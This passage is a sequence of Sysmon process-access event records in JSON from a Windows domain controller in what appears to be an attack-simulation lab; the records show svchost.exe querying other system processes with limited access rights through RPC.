{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nTargetProcessId: 1304\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","TargetProcessId":"1304","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D3D50000}\r\nTargetProcessId: 1396\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D3D50000}","TargetProcessId":"1396","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010A6F30000}\r\nTargetProcessId: 1612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010A6F30000}","TargetProcessId":"1612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:08.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","SourceProcessId":"1004","SourceThreadId":"4244","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:08.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nSourceProcessId: 1004\r\nSourceThreadId: 4244\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nTargetProcessId: 3160\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 